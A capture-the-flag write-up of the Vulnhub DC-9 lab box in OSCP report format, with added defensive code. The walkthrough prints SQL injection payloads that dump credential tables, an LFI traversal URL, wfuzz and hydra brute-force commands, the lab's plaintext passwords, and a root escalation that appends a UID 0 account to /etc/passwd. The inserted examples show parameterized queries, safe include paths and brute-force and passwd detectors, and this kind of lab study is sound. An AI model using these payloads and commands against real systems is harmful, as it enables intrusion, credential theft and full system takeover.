With the OSCP exam approaching, I'm working through a few Vulnhub boxes for practice and, at the same time, practicing report writing.
Box URL:
https://www.vulnhub.com/entry/dc-9,412/
Where I got stuck:
1. After obtaining the LFI, I tried including /proc/self/fd to get a shell, without success. I then looked through some walkthroughs and discovered Linux knockd.
2. While working on the box I did not enumerate every database, only the current one, so the ssh brute force ran for ages without any result. Only after reading the walkthroughs did I find that the credentials were in another database.
The OSCP Exam Report template is here:
https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf
Since only section 3 of the report is what matters, this write-up follows the format of section 3 directly.
3.2 Report – Service Enumeration
| Server IP Address | Ports Open | Service / Banner |
|---|---|---|
| 192.168.92.167 | 22, 80 | ssh / Apache |
3.3 Report – Penetration
Vulnerability Exploited: SQL Injection and LFI
System Vulnerable: 192.168.92.167
Vulnerability Explanation: There is one SQL injection and one local file inclusion (LFI) vulnerability in this web application. A combination of these vulnerabilities was used to obtain a low-privilege shell.
Privilege Escalation Vulnerability: Abuse of sudo permissions
Vulnerability Fix: SQL syntax filter
Severity: Critical
Information Gathering:
kali@kali:~/Desktop$ sudo nmap -sV -A 192.168.92.167 -n
……
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
…..
Found a SQL injection in the website on port 80. The URL is:
http://192.168.92.167/results.php
Testing payload:
' or 1=1 #

Get the current database type (version string):
' union select 1,2,3,4,5,(select version()) #

Enumerate all databases:
' union select 1,2,3,4,5,(select schema_name from information_schema.schemata limit 0,1) #

Change the "limit" offset and resend. Got three database schemas:
information_schema
Staff
users
Check the currently used database:

Get all tables of the currently used database:
' union select 1,2,3,4,5,(select table_name from information_schema.tables where table_schema=database() limit 0,1) #

Change the "limit" offset and resend. Got two tables:
StaffDetails
Users
Get all columns in table "Users":
' union select 1,2,3,4,5,(select column_name from information_schema.columns where table_schema=database() and table_name='Users' limit 0,1) #
Change the "limit" offset and resend. Got three columns:
UserID
Username
Password
With the above information, we can get the username and password directly via SQL injection:
Payload:
' union select 1,2,3,4,5,(select username from Users limit 0,1) #
' union select 1,2,3,4,5,(select password from Users limit 0,1) #
Got the following information:
| Username | Password |
|---|---|
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
Go to https://www.somd5.com/ and crack the MD5 hash successfully. The plaintext is transorbital1:

Now we should enumerate the tables of database "users". The steps are the same as above, so I only list the payloads here.
Payload to get all tables of database "users":
' union select 1,2,3,4,5,(select table_name from information_schema.tables where table_schema='users' limit 0,1) #
Got one table:
UserDetails
Payload to get all columns of table "UserDetails", database "users":
' union select 1,2,3,4,5,(select column_name from information_schema.columns where table_name='UserDetails' and table_schema='users' limit 0,1) #
Got six columns:
id
firstname
lastname
username
password
reg_date
Found an interesting column "password". Use Burp Intruder to fetch all usernames and passwords from table "UserDetails" in database "users".
Payload:
' union select 1,2,3,4,5,(select password from users.UserDetails limit §0§,1) #
' union select 1,2,3,4,5,(select username from users.UserDetails limit §0§,1) #


Got the following usernames and passwords:
marym:3kfs86sfd
julied:468sfdfsd2
fredf:4sfd87sfd1
barneyr:RocksOff
tomc:TC&TheBoyz
jerrym:B8m#48sd
wilmaf:Pebbles
bettyr:BamBam01
chandlerb:UrAG0D!
joeyt:Passw0rd
rachelg:yN72#dsd
rossg:ILoveRachel
monicag:3248dsds7s
phoebeb:smellycats
scoots:YR3BVxxxw87
janitor:Ilovepeepee
janitor2:Hawaii-Five-0
SQL injection finished. Now we log in to the target website as user "admin" with password "transorbital1".
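The report's fix line says "SQL syntax filter"; the fix that actually removes the whole class of payloads used above is parameterization. The following is an added example, not the DC-9 application's code: a results.php-style search rebuilt as a string-concatenated query next to its parameterized form, with the report's tautology and UNION payloads run against both. SQLite stands in for the target's MySQL, so the comment marker `#` becomes SQLite's `--` and `information_schema` becomes `sqlite_master`; the table layout and the second user row are constructed.

```python
import sqlite3

# Added example (not the DC-9 application's code). Constructed sample data
# modelled on the report's "Users" table; the admin row reuses the hash the
# report recovered, the second row is made up.
SAMPLE_USERS = [
    (1, "admin", "856f5de590ef37314e7c3bdf6f8a66dc"),
    (2, "staff1", "constructed-hash-0001"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (UserID INTEGER PRIMARY KEY, Username TEXT, Password TEXT)"
    )
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def search_vulnerable(conn, username):
    # The user-supplied value is spliced into the SQL text, so a quote in it
    # ends the string literal and the rest is parsed as SQL.
    sql = f"SELECT UserID, Username, Password FROM Users WHERE Username = '{username}'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, username):
    # The value is bound separately from the SQL text; quotes, comment markers
    # and UNION keywords inside it are data, never syntax.
    sql = "SELECT UserID, Username, Password FROM Users WHERE Username = ?"
    return conn.execute(sql, (username,)).fetchall()


# The report's payloads, with MySQL's '#' comment replaced by SQLite's '--'
# and information_schema replaced by sqlite_master.
PAYLOAD_TAUTOLOGY = "' or 1=1 -- "
PAYLOAD_UNION = "' union select 1,2,(select name from sqlite_master limit 1) -- "


def demo():
    conn = make_db()
    return {
        "vuln_tautology": search_vulnerable(conn, PAYLOAD_TAUTOLOGY),
        "vuln_union": search_vulnerable(conn, PAYLOAD_UNION),
        "safe_tautology": search_parameterized(conn, PAYLOAD_TAUTOLOGY),
        "safe_union": search_parameterized(conn, PAYLOAD_UNION),
        "safe_legit": search_parameterized(conn, "admin"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

Against the concatenated query the tautology returns every row and the UNION payload returns a schema name in place of user data, which is exactly the enumeration walk shown above; against the parameterized query both payloads return nothing, while a normal lookup for `admin` still works.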
Note the line “File does not exits”

Try the following payload:
http://192.168.92.167/manage.php?file=../../../../../etc/passwd

Brute force Linux local files:
wfuzz -u http://192.168.92.167/manage.php?file=../../../../..FUZZ -w Linux_File.txt -b "PHPSESSID=an0drpvpbm4gv0e70s99nj5evc" --hh 1341
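The `file` parameter of manage.php accepts any path, which is what makes the `../../../../../etc/passwd` payload and the wfuzz path list work. As an added example (not the DC-9 application's code), this is how such an include parameter can be resolved safely: canonicalize the path, require that it stays inside the include directory, and restrict the extension. `BASE_DIR` and the sample requests are assumptions, not paths taken from the target.

```python
import os

# Added example (not the DC-9 application's code). BASE_DIR is an assumed
# include directory; the target's real layout is not known from the report.
BASE_DIR = "/var/www/html/pages"
ALLOWED_EXT = (".php", ".html")


def resolve_include(requested, base_dir=BASE_DIR):
    """Return the absolute path to include, or None if the request is refused.

    realpath() collapses every '..' and follows symlinks, so the decision is
    made on where the path actually ends up rather than on how it looks.
    """
    base = os.path.realpath(base_dir)
    # join() discards base when 'requested' is absolute; the containment check
    # below is what catches that case, so it must not be skipped.
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath rather than startswith, so that /var/www/html/pages2 is not
    # treated as living inside /var/www/html/pages.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not candidate.endswith(ALLOWED_EXT):
        return None
    return candidate


# Constructed requests: the report's traversal payload, an absolute path,
# a sibling-directory escape and a legitimate page.
SAMPLE_REQUESTS = [
    "../../../../../etc/passwd",
    "/etc/passwd",
    "../pages2/x.php",
    "about.php",
]


def check_all(requests=SAMPLE_REQUESTS):
    """Map each request to the resolved path, or None when refused."""
    return {r: resolve_include(r) for r in requests}


if __name__ == "__main__":
    for req, result in check_all().items():
        print(f"{req!r:32} -> {'ALLOW ' + result if result else 'REFUSE'}")
```

Only `about.php` resolves; the three escapes are refused before anything is opened. A stricter variant maps the parameter onto a fixed list of page names and never touches the filesystem with user input at all.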

Found an interesting file "knockd.conf".
We need to knock on port 7469, port 8475 and port 9842 in sequence, and then ssh will be opened.

Knock those ports:

ssh is open now. Use hydra to brute force ssh. The username and password dictionary is the set of usernames and passwords obtained from table "UserDetails", database "users".
hydra -C userpass.txt ssh://192.168.92.167 -t 4 -vV

Got three users and passwords:
login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee
Log in via ssh to the target as user "janitor". Found an interesting file at /home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt

These seem to be passwords for the other users.
Let's turn to hydra again and brute force ssh. The password dictionary is the passwords in the file /home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt
hydra -L user.txt -P pass.txt ssh://192.168.92.167 -t 4

Got one user and password:
fredf:B4-Tru3-001
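Both hydra runs above (the `-C userpass.txt` run and the `-L user.txt -P pass.txt` run) leave the same trace on the target: a burst of `Failed password` lines in sshd's auth log from one source, followed by an `Accepted password` once a guess lands. As an added example that is not part of the report, this is a minimal detector over such lines. The log lines are constructed; the client address 192.0.2.10 is a documentation-range placeholder, not the real attacking host, and the usernames are the ones enumerated earlier.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Added example (not from the report). Constructed sshd auth.log lines;
# 192.0.2.10 / 192.0.2.25 are placeholder client addresses.
SAMPLE_AUTH_LOG = """\
Dec 29 10:15:01 dc-9 sshd[1201]: Failed password for invalid user marym from 192.0.2.10 port 40110 ssh2
Dec 29 10:15:01 dc-9 sshd[1202]: Failed password for invalid user julied from 192.0.2.10 port 40112 ssh2
Dec 29 10:15:02 dc-9 sshd[1203]: Failed password for fredf from 192.0.2.10 port 40114 ssh2
Dec 29 10:15:02 dc-9 sshd[1204]: Failed password for invalid user barneyr from 192.0.2.10 port 40116 ssh2
Dec 29 10:15:03 dc-9 sshd[1205]: Failed password for tomc from 192.0.2.10 port 40118 ssh2
Dec 29 10:15:04 dc-9 sshd[1206]: Accepted password for chandlerb from 192.0.2.10 port 40120 ssh2
Dec 29 10:15:05 dc-9 sshd[1207]: Failed password for invalid user wilmaf from 192.0.2.10 port 40122 ssh2
Dec 29 10:40:00 dc-9 sshd[1300]: Failed password for fredf from 192.0.2.25 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)


def parse_events(text, year=2020):
    """Yield (timestamp, result, user, src) tuples; unrelated lines are skipped."""
    # syslog timestamps carry no year; an assumed one keeps the deltas comparable.
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failures inside any `window`.

    Each finding also lists accounts that source logged into successfully,
    which is the signal that a guessed credential worked.
    """
    failures = defaultdict(list)
    accepted = defaultdict(set)
    for ts, result, user, src in events:
        if result == "Failed":
            failures[src].append((ts, user))
        else:
            accepted[src].add(user)
    findings = {}
    for src, attempts in failures.items():
        attempts.sort()
        times = [t for t, _ in attempts]
        for i, start in enumerate(times):
            j = i
            while j < len(times) and times[j] - start <= window:
                j += 1  # extend the window while failures stay within it
            if j - i >= threshold:
                findings[src] = {
                    "failures": j - i,
                    "distinct_users": len({u for _, u in attempts[i:j]}),
                    "accepted_logins": sorted(accepted[src]),
                }
                break
    return findings


def run(text=SAMPLE_AUTH_LOG):
    return detect_bruteforce(parse_events(text))


if __name__ == "__main__":
    for src, info in run().items():
        print(src, info)
```

The single failure from 192.0.2.25 stays below the threshold; 192.0.2.10 is flagged with six failures against six different accounts in a few seconds and one successful login, which matches what the `-t 4` hydra runs produce.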
Log in via ssh to the target as user "fredf". Enumerate sudo permissions.

Try to run this executable file.

Test the "append" feature of this executable file.

Try to append a new line to /etc/passwd:
fredf@dc-9:~/app$ echo 'panpan:zZoY87S9mdtnk:0:0:root:/root:/bin/bash' > 6.txt
fredf@dc-9:~/app$ sudo /opt/devstuff/dist/test/test 6.txt /etc/passwd
cat /etc/passwd

su panpan
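The appended line gives a second UID 0 account whose hash sits in /etc/passwd itself rather than in /etc/shadow. As an added example that is not part of the report, this audit reads a passwd-format file and flags exactly those two conditions, plus malformed entries. The sample file is constructed; only the `panpan` line is the one appended above.

```python
# Added example (not from the report). Constructed passwd sample; the panpan
# line is the entry appended in the write-up, the others are made up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1001:1001::/home/fredf:/bin/bash
panpan:zZoY87S9mdtnk:0:0:root:/root:/bin/bash
broken line without fields
"""

# Values that mean "no usable password here": shadowed or locked.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return (line_no, account, reason) findings for passwd-format text."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed entry"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append((line_no, name, "extra UID 0 account"))
        if pw == "":
            findings.append((line_no, name, "empty password field"))
        elif pw not in SHADOWED_OR_LOCKED:
            # A real hash here is checked by login directly, bypassing shadow.
            findings.append((line_no, name, "password hash stored in passwd"))
    return findings


def audit_file(path="/etc/passwd"):
    """Run the same audit over a file on disk."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for line_no, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line_no}: {name}: {reason}")
```

Run against the sample, the audit reports the `panpan` entry twice (UID 0 and an in-line hash) and the malformed line once. The root cause remains the sudo rule itself: a tool that is allowed to append to any path as root is equivalent to root, so the rule, not only the resulting passwd line, is what has to go.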

Proof file:
